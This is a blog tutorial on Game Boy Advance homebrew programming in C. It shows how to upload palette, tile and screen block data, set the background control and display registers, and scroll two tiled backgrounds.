<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "tiles.h"
</span>
<span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
#define MEM_OBJ_PALETTE ((uint16*)(0x05000200))
</span>
<span class="kt">void</span> <span class="nf">UploadPaletteMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_BG_PALETTE</span><span class="p">,</span> <span class="n">bgPal</span><span class="p">,</span> <span class="n">bgPalLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Perfect, the palette data was easy! Next we need to get our tiles into memory. You may recall from <a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">last week</a> that the data for sprite tiles starts at the fifth tile-block in tile memory. This is because the first 4 of those blocks are reserved for backgrounds. So let’s put our tile data into the first one:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000)
</span>
<span class="kt">void</span> <span class="nf">UploadTileMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">bgTiles</span><span class="p">,</span> <span class="n">bgTilesLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>All of this is almost identical to last week, so let’s start doing something different and get our Screen Block data into memory. Screen blocks share memory with Tile memory. A Screen Block is 2048 bytes, which means that we can fit 8 of them into a single tile-block. It’s up to us to make sure that we don’t try to put a Screen Block and tile data into the same spot in memory.</p>
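<p>The overlap between the two kinds of blocks is easier to see as address arithmetic. This is only a sketch: the helper names are made up for illustration, and the sizes come from the typedefs used in this post (a Screen Block is 1024 16 bit entries, a tile-block is 256 entries of 64 bytes):</p>

```c
#include <stdint.h>

#define VRAM_BASE         0x06000000u
#define SCREENBLOCK_BYTES 2048u  /* 32 * 32 entries, 2 bytes each */
#define TILEBLOCK_BYTES   16384u /* 256 entries * 64 bytes each */

/* Hypothetical helper: address where Screen Block n starts. */
static inline uint32_t ScreenBlockAddress(uint32_t n)
{
    return VRAM_BASE + n * SCREENBLOCK_BYTES;
}

/* Hypothetical helper: address where tile-block n starts. */
static inline uint32_t TileBlockAddress(uint32_t n)
{
    return VRAM_BASE + n * TILEBLOCK_BYTES;
}

/* Hypothetical helper: which tile-block a given Screen Block lives inside. */
static inline uint32_t TileBlockContaining(uint32_t screenBlock)
{
    return (screenBlock * SCREENBLOCK_BYTES) / TILEBLOCK_BYTES;
}
```

<p>Screen Blocks 0 through 7 all land inside tile-block 0, and Screen Block 8 starts at exactly the same address as tile-block 1, so whichever one you write last wins.</p>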
<p>If you’re using the example data, you’ll notice that we only have 2 tiles to upload into memory (a checkerboard tile, and a transparent tile), so it’s safe for us to just go 1 Screen Block away from the start of VRAM:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="cp">#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
</span>
<span class="kt">void</span> <span class="nf">UploadScreenBlock</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//checkerBg is the ScreenBlock data from the gist</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">checkerBg</span><span class="p">,</span> <span class="n">checkerBgLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>That should about do it for uploading the data we have for our tiles, but I also mentioned that I generated the gradient background in code. Here’s the code for that:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">GenerateGradient</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//we've uploaded 4 colours to palette memory</span>
<span class="c1">//so make sure we don't overwrite those</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="o">*</span><span class="p">((</span><span class="n">uint16</span><span class="o">*</span><span class="p">)(</span><span class="n">MEM_BG_PALETTE</span><span class="o">+</span><span class="p">(</span><span class="mi">4</span><span class="o">+</span><span class="n">i</span><span class="p">)))</span> <span class="o">=</span> <span class="n">MakeCol</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//every tile is 64 palette indices</span>
<span class="c1">//we have 32 grayscale values from above</span>
<span class="n">uint8</span> <span class="n">tile</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="mi">64</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">tile</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="mi">4</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="n">i</span><span class="p">],</span> <span class="n">tile</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//generate 2 screen blocks,</span>
<span class="c1">//each gray value getting two tiles of width</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">block</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">block</span> <span class="o"><</span> <span class="mi">2</span><span class="p">;</span> <span class="o">++</span><span class="n">block</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">uint16</span> <span class="n">screenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="c1">//screen block data is row by row, top to bottom</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">j</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//each block gets 16 colours, 2 tiles wide for each</span>
<span class="n">screenBlock</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">+</span> <span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">block</span><span class="o">*</span><span class="mi">16</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="n">block</span><span class="o">+</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">screenBlock</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">2048</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>I was torn on whether or not to include this in the post, but I think it’s a good example of another way of working with all the types of memory we’re wrangling to get data on the screen. It also gives us an opportunity to work with a background that uses more than 1 Screen Block, since the gradient is 2 Screen Blocks wide.</p>
<p>If the above code is unclear, that’s ok! I don’t think it was particularly common to generate background data like this anyway. If you want to follow along, just copy and paste the above code and pretend we uploaded that data the same way we did the other data, since it has nothing to do with understanding how the GBA handles backgrounds.</p>
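<p>If the colour packing in MakeCol is the confusing part, here is a standalone sketch of the same idea. PackColour is a hypothetical name, and the masking is my own addition (MakeCol above doesn’t do it). It assumes each channel is 5 bits wide, which is why the gradient loop stops at 32 shades:</p>

```c
#include <stdint.h>

/* Hypothetical variant of MakeCol: pack three 5 bit channels into one
   16 bit colour, with red in the lowest bits and blue in the highest.
   Each channel is masked so out of range values can't spill into
   a neighbouring channel. */
static inline uint16_t PackColour(uint32_t red, uint32_t green, uint32_t blue)
{
    return (uint16_t)((red & 31u) | ((green & 31u) << 5) | ((blue & 31u) << 10));
}
```

<p>Passing the same value for all three channels, as the gradient code does, gives a shade of gray. The brightest one, PackColour(31, 31, 31), comes out as 0x7FFF.</p>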
<h2 id="turning-things-on">Turning Things On</h2>
<p>The hard part is officially over! All that’s left now is to tell the hardware to use the data we’re feeding it, and glue all the snippets we have together.</p>
<p>Let’s talk about our friend the display control register (0x04000000). In addition to doing things like setting a video mode or enabling objects, this register is also used to enable or disable backgrounds.</p>
<p>We get to work with up to four backgrounds at a time on the GBA, and you can enable them like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define VIDEOMODE_0 0x0000
#define BACKGROUND_0 0x0100
#define BACKGROUND_1 0x0200
#define BACKGROUND_2 0x0400
#define BACKGROUND_3 0x0800
</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">BACKGROUND_1</span><span class="p">;</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We’re only going to use the first two backgrounds today, but you can turn on all four backgrounds, or only 1 and 3, or any other combination that you want to use.</p>
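<p>Since the four enable flags are consecutive bits, you could also compute them instead of spelling each one out. This is a sketch with hypothetical names, not something the rest of this post relies on:</p>

```c
#include <stdint.h>

/* Hypothetical helper: the enable bit for background n (0 to 3)
   in the display control register. */
#define BACKGROUND_ENABLE(n) ((uint16_t)(0x0100u << (n)))

/* Hypothetical helper: build the enable bits for several backgrounds
   at once. Bit 0 of mask means background 0, bit 1 means background 1,
   and so on. Anything above bit 3 is ignored. */
static inline uint16_t BackgroundEnableMask(uint32_t mask)
{
    return (uint16_t)((mask & 0xFu) << 8);
}
```

<p>For example, BackgroundEnableMask(0xA) turns on only backgrounds 1 and 3, and gives 0x0A00.</p>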
<p>Also, we’re still in VIDEOMODE_0. This is because it’s the easiest tiled mode to understand, and we (I) still don’t know enough to actually use any of the features in the other tiled modes.</p>
<p>If you’re in a bitmap mode, you need to enable Background 2 in order for anything to appear on the screen, but as far as I know, you can’t actually do anything with it, it’s just a flag needed to make bitmap modes work.</p>
<h2 id="defining-our-backgrounds">Defining Our Backgrounds</h2>
<p>Just like with Sprites (err.. Objects that is), we need to set up a few values to define how the hardware should use our background data. Mercifully, backgrounds are actually much easier to work with than Sprites. They only need a single 16 bit value set.</p>
<p>Since there are only 4 backgrounds, these values live at fixed memory locations:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_BG0_CONTROL *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL *((volatile uint16*)(0x0400000A))
#define REG_BG2_CONTROL *((volatile uint16*)(0x0400000C))
#define REG_BG3_CONTROL *((volatile uint16*)(0x0400000E))</span></code></pre></figure>
<p>What each bit in these values means is as follows:</p>
<div align="center">
<table style="border:1px solid black; width=600px; padding:2px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>BG</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Size (defined below)</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">D</td>
<td>Ignored today (see <a href="http://www.coranac.com/tonc/text/regbg.htm">Tonc</a> for info)</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">CBA98</td>
<td>What Screen Block to start at</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">7</td>
<td>Color mode: (1 for 8bpp, 0 for 4bpp)</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">6</td>
<td>Ignored today (see <a href="http://www.coranac.com/tonc/text/regbg.htm">Tonc</a> for info)</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">54</td>
<td>Nothing, empty bits</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">32</td>
<td>Tile Block to use</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">10</td>
<td>Z Depth</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Just like with Sprites, the size bits above select a value from another table. For backgrounds, this table is as follows:</p>
<div align="center">
<table style="border:1px solid black; width=480px; padding:2px;">
<colgroup>
<col width="100px" />
<col width="100px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>Bits</th>
<th> Size (in Tiles)</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>00</td>
<td style="border:1px solid black;">32x32</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">01</td>
<td>64x32</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">10</td>
<td>32x64</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">11</td>
<td>64x64</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Using the above tables, if we wanted to define our first background (the checkerboard), as a 32x32 tile background which uses tiles starting at the first tile block, and uses the second Screen Block (since it’s offset from the start of VRAM to make space for tile memory), we would do the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//Size 00, Screen Block 1, Color Mode 1, Tile Block 0, Depth 0</span>
<span class="c1">//0000 0001 1000 0000</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span></code></pre></figure>
<p>Notice that we want our Z Depth to be 0 as well. The higher this value, the farther back in the drawing order a background is, so a BG at depth 0 will draw on top of backgrounds with any higher values. Since our checkerboard background has the transparent pixels in it, we want it to be drawn on top of whatever will fill in those transparent pixels.</p>
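<p>If assembling these values by hand feels error prone, the bit layout from the table can be wrapped in a small function. This is a sketch only: MakeBgControl and its parameter names are hypothetical, and it leaves the two bits marked “Ignored today” at zero:</p>

```c
#include <stdint.h>

/* Hypothetical helper: pack the fields from the table above into a
   16 bit background control value.
   size:        bits F-E (row of the size table)
   screenBlock: bits C-8 (Screen Block to start at)
   colourMode:  bit 7    (1 for 8bpp, 0 for 4bpp)
   tileBlock:   bits 3-2 (tile-block to use)
   priority:    bits 1-0 (Z Depth, 0 draws on top) */
static inline uint16_t MakeBgControl(uint32_t size, uint32_t screenBlock,
                                     uint32_t colourMode, uint32_t tileBlock,
                                     uint32_t priority)
{
    return (uint16_t)(((size & 0x3u) << 14) |
                      ((screenBlock & 0x1Fu) << 8) |
                      ((colourMode & 0x1u) << 7) |
                      ((tileBlock & 0x3u) << 2) |
                      (priority & 0x3u));
}
```

<p>MakeBgControl(0, 1, 1, 0, 0) produces 0x0180, the same value we wrote by hand for the checkerboard.</p>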
<p>If we put all this together (leaving out the code for the second background), we get:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <string.h>
#include "tiles.h"
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define BACKGROUND_0 0x0100
</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL *((volatile uint16*)(0x04000008))
</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
</span>
<span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//load data</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_BG_PALETTE</span><span class="p">,</span> <span class="n">bgPal</span><span class="p">,</span> <span class="n">bgPalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">bgTiles</span><span class="p">,</span> <span class="n">bgTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">checkerBg</span><span class="p">,</span> <span class="n">checkerBgLen</span><span class="p">);</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span><span class="c1">// 0000 0001 1000 0000;</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And if you run that, you should see:</p>
<div align="center">
<img src="/images/post_images/2017-04-11/bg0.png" /><br />
</div>
<p>Which is excellent! We officially have our first background on the screen. Let’s add our second one now. Remember that we used 2 Screen Blocks to hold all the values for this background, and we want them laid out horizontally, so we’ll have a 64x32 background. We want it to be at priority 1, so that it draws behind the checkerboard (which is at priority 0), and use the data we populated with the gradient generating code above.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">// Size 01, Screen Block 2, Color Mode 1, Tile Block 1, Priority 1</span>
<span class="c1">// 0100 0010 1000 0101</span>
<span class="n">REG_BG1_CONTROL</span> <span class="o">=</span> <span class="mh">0x4285</span><span class="p">;</span></code></pre></figure>
<p>If we add the above line, and the required #defines and gradient code to what we have, we get the following (I’ve omitted the GenerateGradient() function body for brevity). I promise after this to not paste any more large code blocks into the article :)</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <string.h>
#include "tiles.h"
#include "bg.h"
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define BACKGROUND_0 0x0100
#define BACKGROUND_1 0x0200
</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
#define REG_BG0_CONTROL *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL *((volatile uint16*)(0x0400000A))
</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000)
#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
</span>
<span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
#define MEM_PALETTE ((uint16*)(0x05000200))
</span>
<span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">GenerateGradient</span><span class="p">();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//load data</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_BG_PALETTE</span><span class="p">,</span> <span class="n">bgPal</span><span class="p">,</span> <span class="n">bgPalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">bgTiles</span><span class="p">,</span> <span class="n">bgTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">checkerBg</span><span class="p">,</span> <span class="n">checkerBgLen</span><span class="p">);</span>
<span class="n">GenerateGradient</span><span class="p">();</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span><span class="c1">// 0000 0001 1000 0000;</span>
<span class="n">REG_BG1_CONTROL</span> <span class="o">=</span> <span class="mh">0x4285</span><span class="p">;</span> <span class="c1">// 0100 0010 1000 0101</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">BACKGROUND_1</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you compile and run the above (filling in the GenerateGradient function), you should end up with this:</p>
<div align="center">
<img src="/images/post_images/2017-04-11/bg1.png" /><br />
</div>
<p>Which is almost exactly what we wanted to end up with when we started! All that’s left is to add some movement, and this is pretty easy to do:</p>
<h2 id="moving-things-around">Moving Things Around</h2>
<p>In truth, backgrounds don’t really move; your viewport moves over top of the background. This makes sense with 1 background, but it gets a bit abstract when you think about multiple backgrounds moving at once. In essence, all you have to keep in mind is that increasing the X value of the background scrolling register is going to move it to the left, because what you’re doing is actually moving where your screen is to the right. The same is true for the vertical scrolling register.</p>
<p>As you may have guessed from that explanation, each background on the GBA has two additional registers, one for X offset, and one for Y offset. All backgrounds will repeat infinitely as you scroll them, so you can keep incrementing these values at will, without worrying about resetting them when you get to the edge of a background image. These registers are defined as follows:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_BG0_SCROLL_H *((volatile uint16*)(0x04000010))
#define REG_BG0_SCROLL_V *((volatile uint16*)(0x04000012))
#define REG_BG1_SCROLL_H *((volatile uint16*)(0x04000014))
#define REG_BG1_SCROLL_V *((volatile uint16*)(0x04000016))
#define REG_BG2_SCROLL_H *((volatile uint16*)(0x04000018))
#define REG_BG2_SCROLL_V *((volatile uint16*)(0x0400001A))
#define REG_BG3_SCROLL_H *((volatile uint16*)(0x0400001C))
#define REG_BG3_SCROLL_V *((volatile uint16*)(0x0400001E))</span></code></pre></figure>
<p>These are pretty self-explanatory: assign numbers to them to make the corresponding background move. The only weird part about them is that they are write-only, so you can’t read the current value back or increment a register in place. You have to keep track of the scroll value yourself and write it to the register.</p>
<p>Using these registers, it’s trivial to modify our code from earlier to make things scroll. For brevity’s sake, I’m just going to show how to modify the while(1){} section from the above code, rather than paste the whole thing again:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="n">hScroll</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">h2Scroll</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">REG_BG0_SCROLL_H</span> <span class="o">=</span> <span class="o">-</span><span class="n">hScroll</span><span class="p">;</span>
<span class="n">REG_BG1_SCROLL_H</span> <span class="o">=</span> <span class="n">h2Scroll</span><span class="p">;</span>
<span class="n">h2Scroll</span> <span class="o">+=</span><span class="mi">2</span><span class="p">;</span>
<span class="n">hScroll</span> <span class="o">=</span> <span class="n">h2Scroll</span><span class="o">/</span><span class="mi">3</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>This is pretty much what you’d expect: background 0 is being assigned a value that is decreasing, which means it should appear to be moving right on the screen (since our viewport is moving left), and vice versa with the gradient background. This matches up with the scroll directions we had at the top of the post, which is perfect, because that means we’re done!</p>
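<p>Since the scroll registers can’t be read back, the real scroll position has to live in ordinary variables. Here’s a minimal sketch of the loop body above that can be run on a PC, with two plain variables standing in for the registers. The names ScrollShadow, scroll_reg_value and scroll_step are made up for illustration, and the 9 bit mask is an assumption that the hardware only looks at the low 9 bits of each scroll register:</p>

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical shadow copy of the scroll state (the registers are write-only). */
typedef struct {
    int hScroll;
    int h2Scroll;
} ScrollShadow;

/* Value that would end up in a scroll register.
   Assumption: only the low 9 bits (0-511) are used, so negatives wrap. */
static uint16_t scroll_reg_value(int scroll)
{
    return (uint16_t)((unsigned)scroll & 0x1FFu);
}

/* One iteration of the loop body, writing to stand-in variables
   instead of REG_BG0_SCROLL_H and REG_BG1_SCROLL_H. */
static void scroll_step(ScrollShadow *s, uint16_t *bg0_out, uint16_t *bg1_out)
{
    assert(s && bg0_out && bg1_out);
    *bg0_out = scroll_reg_value(-s->hScroll);
    *bg1_out = scroll_reg_value(s->h2Scroll);
    s->h2Scroll += 2;
    s->hScroll = s->h2Scroll / 3;
}
```

<p>Starting from zero, the third call writes 511 for background 0 (that’s -1 wrapped into 9 bits) and 4 for background 1.</p>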
<h2 id="conclusion">Conclusion</h2>
<p>I suppose I should link you to some tools that can be used to create backgrounds, but I do so only grudgingly, because I don’t think they’re great. Tonc suggests <a href="http://www.tilemap.co.uk/mappy.php">Mappy</a> and <a href="http://nessie.gbadev.org/">MapEd</a>. To be fair, I haven’t written a tile mapping tool so I don’t really have much of a leg to stand on when criticizing these, but I found them rather fiddly to use, which is why I ended up just hand building some really simple ones for this post.</p>
<p>I’d love to hear about better tools for doing this sort of work. I think <a href="http://www.mapeditor.org/">Tiled</a> might be better, but I don’t know how well suited it is to GBA style stuff. In any case, if you know of better tools, let me know <a href="https://twitter.com/khalladay">on Twitter</a>. See you next week!</p>
